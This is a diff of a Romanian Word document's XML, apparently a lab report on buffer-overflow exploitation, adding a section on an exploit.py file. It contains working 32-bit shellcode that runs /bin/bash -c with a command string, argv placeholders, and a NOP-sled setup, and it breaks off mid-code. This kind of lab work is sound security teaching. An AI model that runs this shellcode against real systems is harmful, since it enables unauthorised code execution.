-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:pStyle w:val="Heading2"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
@@ -1851,6 +1795,4163 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+        <w:t>Structura fisierului exploit/py</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="6A9955"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+        <w:t>#!/usr/bin/python3</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="C586C0"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>import</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="4EC9B0"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>sys</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="6A9955"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"># 32-bit Generic Shellcode </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>shellcode_32</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = (</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D7BA7D"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>\xeb\x29\x5b\x31\xc0\x88\x43\x09\x88\x43\x0c\x88\x43\x47\x89\x5b</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D7BA7D"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>\x48\x8d\x4b\x0a\x89\x4b\x4c\x8d\x4b\x0d\x89\x4b\x50\x89\x43\x54</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D7BA7D"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>\x8d\x4b\x48\x31\xd2\x31\xc0\xb0\x0b\xcd\x80\xe8\xd2\xff\xff\xff</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>"/bin/bash*"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>"-c*"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="6A9955"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t># The * in this line serves as the position marker *</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>"/bin/ls -l; echo '===== Success! ======' *"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>"AAAA"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="6A9955"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t># Placeholder for argv[0] --&gt; "/bin/bash"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>"BBBB"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="6A9955"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t># Placeholder for argv[1] --&gt; "-c"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>"CCCC"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="6A9955"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t># Placeholder for argv[2] --&gt; the command string</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>"DDDD"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="6A9955"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t># Placeholder for argv[3] --&gt; NULL</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>).</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>encode</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>'latin-1'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="4FC1FF"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>N</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="B5CEA8"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>1500</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="6A9955"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t># Fill the content with NOP's</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>content</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="4EC9B0"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>bytearray</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="569CD6"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>0x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="B5CEA8"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>90</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="C586C0"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>for</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="C586C0"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>in</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="4EC9B0"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>range</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="4FC1FF"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>N</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>))</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="6A9955"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t># Choose the shellcode version based on your target</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
